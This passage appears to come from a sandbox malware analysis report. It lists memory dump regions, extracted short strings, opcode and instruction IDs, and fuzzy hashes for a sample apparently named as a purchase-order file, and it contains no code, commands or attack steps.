                                                          • Instruction Fuzzy Hash: 9161C2749093899FDB16CBB8C859BAE7FB5EF06300F09409BE1409B2D2C6786945CF61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq
                                                          • API String ID: 0-2474004448
                                                          • Opcode ID: 7fdbfe183cbb7b10fef5066429aa4d529a5395bb28aca8ec597b4109e77a23c1
                                                          • Instruction ID: 066b24a8087ee52cc557a09b621b7f64c57fc0c9647453c8e881678dc604e410
                                                          • Opcode Fuzzy Hash: 7fdbfe183cbb7b10fef5066429aa4d529a5395bb28aca8ec597b4109e77a23c1
                                                          • Instruction Fuzzy Hash: E05160357001159FCB04DF69D894A6EBBB6FF89311B258169EA06DB361DB31EC02CBE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq
                                                          • API String ID: 0-149360118
                                                          • Opcode ID: 4d99c5b137203928852f8fad37a14c6d5f201113fac52d61c660b699e17e731c
                                                          • Instruction ID: 361a9d6732070adcddcf3f3a5b51c7322df3804e0d40cc3bcdd274a8c48ad65e
                                                          • Opcode Fuzzy Hash: 4d99c5b137203928852f8fad37a14c6d5f201113fac52d61c660b699e17e731c
                                                          • Instruction Fuzzy Hash: CC51C231A00616CFCB14DF68C484A6EFBB1FF89320B558695E926AB391D731F851CBD4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: pbq
                                                          • API String ID: 0-3896149868
                                                          • Opcode ID: b844fc3b583844a94054a2bbc1de707f01c1b98f284a19f8c377a34ab3a11cd8
                                                          • Instruction ID: 3cb5ab542c2d559932f326bbb4d12fc30486fa3746f4fe02fa3642137ff1ec02
                                                          • Opcode Fuzzy Hash: b844fc3b583844a94054a2bbc1de707f01c1b98f284a19f8c377a34ab3a11cd8
                                                          • Instruction Fuzzy Hash: 16512C76600104AFCB499FA8C955E69BBF3FF8D31471A84D4E2099F276DA32DC21EB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q
                                                          • API String ID: 0-1614139903
                                                          • Opcode ID: 51c0530b1b018fc539a865bde15c52507c3913a589ac7bc5c54cdcc382793b5a
                                                          • Instruction ID: 32554b0714a00bd241bc3fa3e3ea9eaad1912490fc87094920ba909d473aa92d
                                                          • Opcode Fuzzy Hash: 51c0530b1b018fc539a865bde15c52507c3913a589ac7bc5c54cdcc382793b5a
                                                          • Instruction Fuzzy Hash: 02416330B106148FCB04AF68D498A6EBBB7EFC9B00F50946DD4469B3A4DF74AD46CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJcq
                                                          • API String ID: 0-1911830065
                                                          • Opcode ID: 8130a1a040c504fc0dcc6df8ea8871a01c3e0a53f3289f5ce00232bb916b2462
                                                          • Instruction ID: fe78eaaccae2f19ee0a75bbcc19ab8e3c9de2bede90149f4ee4a37d46f990d04
                                                          • Opcode Fuzzy Hash: 8130a1a040c504fc0dcc6df8ea8871a01c3e0a53f3289f5ce00232bb916b2462
                                                          • Instruction Fuzzy Hash: 5D51DA78D00208DFDB09DFA9D488AADBBB5FF88310F10806AE815A7361DB749945CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJcq
                                                          • API String ID: 0-1911830065
                                                          • Opcode ID: ddd109a3b5c901cecd600fa32d40c7eb4e4b86487c053a6cbf289e397773677a
                                                          • Instruction ID: 334af98fa1b7e4f424be007ec152fd7bc3cb0d86788adda03a8cbc7fa6412b4a
                                                          • Opcode Fuzzy Hash: ddd109a3b5c901cecd600fa32d40c7eb4e4b86487c053a6cbf289e397773677a
                                                          • Instruction Fuzzy Hash: 5A51C678D00208DFCB09DFA9E588AADBBB6FF8C310F10846AE815A7361DB749945CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q
                                                          • API String ID: 0-1614139903
                                                          • Opcode ID: 155776dc9bd8d44e6b33199f240e073393fd9cb247c07c139b27864c6a3f91c5
                                                          • Instruction ID: b4ed1cc28bc77f11306e82353758e9857886597fba336e0eb109786080280840
                                                          • Opcode Fuzzy Hash: 155776dc9bd8d44e6b33199f240e073393fd9cb247c07c139b27864c6a3f91c5
                                                          • Instruction Fuzzy Hash: BC314D757406109FD708DB69D899B2A7BE6AFC8B10F1045A8E20ACB3A5CF75EC42C791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q
                                                          • API String ID: 0-1614139903
                                                          • Opcode ID: 94a34b0c4337e046f4a566715271139f6ec24358222c687dfaa7e0fbb9cc58de
                                                          • Instruction ID: c8ef4c0ba99be366367e5d17a5464524d996320e1fe46dd52913181c52d42506
                                                          • Opcode Fuzzy Hash: 94a34b0c4337e046f4a566715271139f6ec24358222c687dfaa7e0fbb9cc58de
                                                          • Instruction Fuzzy Hash: BD316F757406009FD708DB69D499F2A7BE6AFC8B00F1044A8E20ACB3A5CE75EC42C791
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05BBE9EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: f050dc16c08cfae71b721c5352aa5435d307b4b83748b590e11a87b5d5573ab7
                                                          • Instruction ID: 2ec15d6f276f6cdb0bc60bac361d1357a69d83b86ba0788a6bf02b3639b269b1
                                                          • Opcode Fuzzy Hash: f050dc16c08cfae71b721c5352aa5435d307b4b83748b590e11a87b5d5573ab7
                                                          • Instruction Fuzzy Hash: 1B31B9B4D002489FCF10CFA9D880AEEFBB5BF49310F20941AE814B7210C775A945CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q
                                                          • API String ID: 0-1614139903
                                                          • Opcode ID: db67e41db19cb990302b3a6a3ab3a2b2efe43d008de758204951e595e11e280c
                                                          • Instruction ID: feb8c9eec6b955138ce15648aeff0da21cee5f4f9e18fbc66bbc9a410b96621b
                                                          • Opcode Fuzzy Hash: db67e41db19cb990302b3a6a3ab3a2b2efe43d008de758204951e595e11e280c
                                                          • Instruction Fuzzy Hash: 8A217136B10104DFCF099FA4D894AADBFB6FF8C710B1540A9E906AB365CA31EC12DB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q
                                                          • API String ID: 0-1614139903
                                                          • Opcode ID: 1023485958dcca1c26b7f2090598d7937297ad4419ee97103578afe6039a72c1
                                                          • Instruction ID: fcec3f6718e984ce8e14b333bf95d9d8eeaa28759247ad8070d7a0c6fea08a97
                                                          • Opcode Fuzzy Hash: 1023485958dcca1c26b7f2090598d7937297ad4419ee97103578afe6039a72c1
                                                          • Instruction Fuzzy Hash: CF219731B102149BCB046B69D859B7EBABBEFC8700F54846DD406EB395CF749C01CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p<^q
                                                          • API String ID: 0-1680888324
                                                          • Opcode ID: 218953aa52dd4868827f5877d7bbe7be11fb39fd292bd11a45ddfa4e91a47cc1
                                                          • Instruction ID: 3445754a3d00826dd9446675a092665f131086ac15a33b992966161f14e3b7b7
                                                          • Opcode Fuzzy Hash: 218953aa52dd4868827f5877d7bbe7be11fb39fd292bd11a45ddfa4e91a47cc1
                                                          • Instruction Fuzzy Hash: 3F213A713041549FCB09CF2AC845AAA7BEAFF89650B0540E5FD45CB3A1DA35ED50DB60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq
                                                          • API String ID: 0-2474004448
                                                          • Opcode ID: 7459e52b0f6cb13db1b8d5801df41ce80f0b3bd9b5773a318a264ed9b8aa9876
                                                          • Instruction ID: 8dd3130ac213cf80f7cf98053588e8a8ed621c86c62404d6ded39b7f7e27dc4f
                                                          • Opcode Fuzzy Hash: 7459e52b0f6cb13db1b8d5801df41ce80f0b3bd9b5773a318a264ed9b8aa9876
                                                          • Instruction Fuzzy Hash: 2111B235700105CFCB04DF69C854A6EBBB6EF89311F2580A5EA05DB3A1DB30EC01CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L
                                                          • API String ID: 0-2909332022
                                                          • Opcode ID: e03308141a27445c3eb137b6dea372bc4085cb9969905150c48fc2ba5e08b4d7
                                                          • Instruction ID: ffd8cdcf142f987d4aca2896ce1569b9c3fb5d50d6235e9580cd53332fe5425a
                                                          • Opcode Fuzzy Hash: e03308141a27445c3eb137b6dea372bc4085cb9969905150c48fc2ba5e08b4d7
                                                          • Instruction Fuzzy Hash: C8F0AF70901228CFEB61CF54C888B9CBBB1BB08304F5094D6D48AA3240DB744EC0DF61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 8f063539a80cde51ffc373b7852d123eb583fefbb94f5e000d05d3bcd73f41fe
                                                          • Instruction ID: 8f42b765c7f2b02765e0a7e98542bf77b04dafbd3e2380cdc27353d2868cb251
                                                          • Opcode Fuzzy Hash: 8f063539a80cde51ffc373b7852d123eb583fefbb94f5e000d05d3bcd73f41fe
                                                          • Instruction Fuzzy Hash: 17F0B770904669CFDF24EF14DC4879AB7B1FB44356F1015D9E80AA3240D7786E85CF56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          • Opcode ID: 6420779934a9264dc1b8a50f86300aaca13f291a39b578da5acc37414db26ad5
                                                          • Instruction ID: 49c7ccc5d4c7a6bf9777da4835b1f74200db65f7697584fe69c8b7209894688f
                                                          • Opcode Fuzzy Hash: 6420779934a9264dc1b8a50f86300aaca13f291a39b578da5acc37414db26ad5
                                                          • Instruction Fuzzy Hash: 98F0F874E102188BDB98DF28C895BDEBBB2EB88300F1080D99449A7355CB306E85CF52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4dae4e9b4724f4388e571fef04a1840480beddfbd49cf561858e057cc2df1574
                                                          • Instruction ID: be8a0676b0739c413df32578a7f133d4940b770e3a768a1432ac3f4aeb68b3eb
                                                          • Opcode Fuzzy Hash: 4dae4e9b4724f4388e571fef04a1840480beddfbd49cf561858e057cc2df1574
                                                          • Instruction Fuzzy Hash: 4112D734A102198FCB14EF64C994BADBBB2BF89300F5185A8D54AAB365DF34ED85CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1da014defa109828c52e29435f062c01e51e5359c236102f8c6625df279e05f
                                                          • Instruction ID: 3254e9f8d259b0ad95eb70c3b90f122fba2075bb8bd129a32f3dd6a9be14f815
                                                          • Opcode Fuzzy Hash: d1da014defa109828c52e29435f062c01e51e5359c236102f8c6625df279e05f
                                                          • Instruction Fuzzy Hash: A0A1E734B102148FCB14DF64D894BA9BBB2BF89300F5485A8E54AAB3A5DF34ED85CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 374c66dbeac88ccb640f62574c59d731ad1c86fc79d7b393fe6542e2e5bc465a
                                                          • Instruction ID: 59669a65b6c656467055b0b61dc18d0597c0dd169e3a182919400e3d2c930cd2
                                                          • Opcode Fuzzy Hash: 374c66dbeac88ccb640f62574c59d731ad1c86fc79d7b393fe6542e2e5bc465a
                                                          • Instruction Fuzzy Hash: 9061AF36A00118DFCF15DF64D844EA9BBB2FF89310F0580E9E509AB262CB31ED56CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1afaef814bf47be0aa0cabfcb339f7a7571122d169b9af57471f263b840242f
                                                          • Instruction ID: a8618ac58b2eb2ba77f39ec8a9ab62c82ba483be693f9120a8fbd003cfdef60d
                                                          • Opcode Fuzzy Hash: a1afaef814bf47be0aa0cabfcb339f7a7571122d169b9af57471f263b840242f
                                                          • Instruction Fuzzy Hash: E5813C35B10514DFCB04DF68D4A8A6DBBB6FF88711F1481A9E40A9B3A5CB74EC41CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e0af1cd7c8515e26e799914565fc63ab84b07a9eb07c1fd325f5a51452e6287
                                                          • Instruction ID: 227b52bba764f562e4b7e359d8d5891cf6584d4675841d850892b987c9d87fb5
                                                          • Opcode Fuzzy Hash: 7e0af1cd7c8515e26e799914565fc63ab84b07a9eb07c1fd325f5a51452e6287
                                                          • Instruction Fuzzy Hash: F481D875A006188FCB14DF68C58499EBBF5FF88710B1985A9E8169B371DB70ED42CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e9c46cc9c870c923c81a127324198bc9ba088f92d957b7757d22f083366ddd1
                                                          • Instruction ID: 6ba82fbf69a7ce9e4873c56af8bdef71696c3f7a503936caa88d2fb3e2bbfa2a
                                                          • Opcode Fuzzy Hash: 6e9c46cc9c870c923c81a127324198bc9ba088f92d957b7757d22f083366ddd1
                                                          • Instruction Fuzzy Hash: 22818478A00208CFEB04DFA5D899BAE77F2FB84300F288169D406A7365DB749DC5CB65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17da1cc0eee2831c35d864b9b31a9198b1de4ed95084a29945eaac26065714c3
                                                          • Instruction ID: e8c1f4ab79588be96e87a64bba890ddffead34ebbcf263e1470ba5921e5a4668
                                                          • Opcode Fuzzy Hash: 17da1cc0eee2831c35d864b9b31a9198b1de4ed95084a29945eaac26065714c3
                                                          • Instruction Fuzzy Hash: 13815078A00208CFEB04DFA9D989BAD77F2FB84300F288169D406A7365DB749DC5CB65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 549b2b03e63596275d050cb7837a0a4a75d5d74e9a7a58586cfdce1a95024b2a
                                                          • Instruction ID: 63718156e08daa4d008e49254e460c59b2063e515fee8b4310bc3fbd2b97bf13
                                                          • Opcode Fuzzy Hash: 549b2b03e63596275d050cb7837a0a4a75d5d74e9a7a58586cfdce1a95024b2a
                                                          • Instruction Fuzzy Hash: 90617F35B012049FDB09DFA5D455BADBBB2FF88321F148069E816A7390CF75E941CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ca46f7f4f57bcd4aef9ce3002eceddb4682bb1a0624188be728df8a7896a52e
                                                          • Instruction ID: f87b70877dd74e9deeff9464ec870d45c24579fc7aabf3703f0682adc882a07c
                                                          • Opcode Fuzzy Hash: 5ca46f7f4f57bcd4aef9ce3002eceddb4682bb1a0624188be728df8a7896a52e
                                                          • Instruction Fuzzy Hash: 29614F78A40208CFEB04DF55D999BADB7F2FB48300F288169D406A7365DB749CC5CB64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3f54d45f8260628cc92a57af4ed0530884f96930cabb2e3e3c6e2f07a0d6336
                                                          • Instruction ID: b854fc297e297a4c13c8258abdd952ae9e043e44c2f9c0dfe88e073efac12b1e
                                                          • Opcode Fuzzy Hash: f3f54d45f8260628cc92a57af4ed0530884f96930cabb2e3e3c6e2f07a0d6336
                                                          • Instruction Fuzzy Hash: C1614D78A40208CFEB04DF55D999BAEB7F2FB48300F288169D406A73A5DB749CC5CB64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24d3b352c8d9c5644b08204be69879aff758092e86f20bc6d66c982d3c949414
                                                          • Instruction ID: 48fedfff4d9e1f07b00b66853743245efed79f132700aefb8720f154e98676ca
                                                          • Opcode Fuzzy Hash: 24d3b352c8d9c5644b08204be69879aff758092e86f20bc6d66c982d3c949414
                                                          • Instruction Fuzzy Hash: 1A611B34B10614DFCB04DF68D898A6DBBB6FF88711F1481A9E8169B3A5DB70EC41CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5420a4c6b387ab87aa8f78e2385043c01f682f8f99b963ecfdb461984c231a1a
                                                          • Instruction ID: 6c8fd234c231f8d40e94c86d08e06945fab0221827cacbf2ebdb8822ea172ce0
                                                          • Opcode Fuzzy Hash: 5420a4c6b387ab87aa8f78e2385043c01f682f8f99b963ecfdb461984c231a1a
                                                          • Instruction Fuzzy Hash: F7612370D09319CFDB29CF69D898BADBBF6BB49300F1095AAD489A7251DB745D81CF00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55f20e72372d3d6c6cdc424518b14b6e01183f4de876f82e700a856f81259743
                                                          • Instruction ID: 5179ec5ab10939c2f64ffc35c6de7b50c37b85cd882da0ac55eff10abc48cc92
                                                          • Opcode Fuzzy Hash: 55f20e72372d3d6c6cdc424518b14b6e01183f4de876f82e700a856f81259743
                                                          • Instruction Fuzzy Hash: DE516935A112188FDB19CF65E554BADBBF2FF89321F2480A9E812A7390CB35E941CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 06a5fb3a08d31a13b72e45e6eac46debb6c3684c2dcff6540656d94e1ecf2a22
                                                          • Instruction ID: 6edbc13936146fef995af0d83fe9245c65b1046a8983b551a0094448f05893bf
                                                          • Opcode Fuzzy Hash: 06a5fb3a08d31a13b72e45e6eac46debb6c3684c2dcff6540656d94e1ecf2a22
                                                          • Instruction Fuzzy Hash: A3513C34B10609DFCB04AF64E458ABD7BB6FF88705F108159E5069B3A8DF74A946CF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af8a329afb9b95164aafeca5ed9dfc199a20bb008c2e5d95b7f76bd3bf31c630
                                                          • Instruction ID: 127e2d72ad1e0e09f1bb881156914d483f72fc1b2b095b14e0e6d3829f9894fb
                                                          • Opcode Fuzzy Hash: af8a329afb9b95164aafeca5ed9dfc199a20bb008c2e5d95b7f76bd3bf31c630
                                                          • Instruction Fuzzy Hash: 4551F0B4D0A21CCFDB14DFA9E844AEDBBB6FB89304F10A42AD415B7240DBB45985CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7b22e790655a0dd85f053307e369cbb04a6204c6ecf0baca31f536c08b66333
                                                          • Instruction ID: 1f6b90a515d25fdbba84f46fde8a9ee82eda013b30b97cb4044c4bd68f6b9bde
                                                          • Opcode Fuzzy Hash: a7b22e790655a0dd85f053307e369cbb04a6204c6ecf0baca31f536c08b66333
                                                          • Instruction Fuzzy Hash: 8C41E031B00604CFD744DF69E488BAAB3F2EB85351F6481B9D009DB26AC7B0DD81CB61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d4d6041fa19f1f2ad814795b83e651e37bd933310b3b9ece3f9452a21793f31
